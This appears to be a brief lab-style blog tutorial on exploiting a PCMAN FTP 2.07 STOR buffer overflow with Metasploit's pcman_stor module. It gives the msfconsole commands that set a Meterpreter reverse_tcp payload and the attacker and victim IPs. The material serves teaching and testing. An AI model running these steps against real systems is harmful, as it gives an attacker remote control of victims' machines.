This Metasploit module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP version 2.07 server when the “/../” parameters are also sent to the server. Please note authentication is required in order to trigger the vulnerability. The overflowing string will also be seen on the FTP server log console.
Exploit Targets
PCMAN FTP version 2.07
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open Kali Linux terminal type msfconsole
Now type use exploit/windows/ftp/pcman_stor
msf exploit (pcman_stor)>set payload windows/meterpreter/reverse_tcp
msf exploit (pcman_stor)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (pcman_stor)>set rhost 192.168.1.5 (IP of victim PC)
msf exploit (pcman_stor)>exploit
The post Hack Remote Windows PC Using PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow appeared first on Hacking Articles.